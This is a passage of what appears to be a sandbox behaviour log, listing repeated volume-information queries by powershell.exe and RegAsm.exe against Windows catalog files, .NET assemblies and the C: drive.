Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
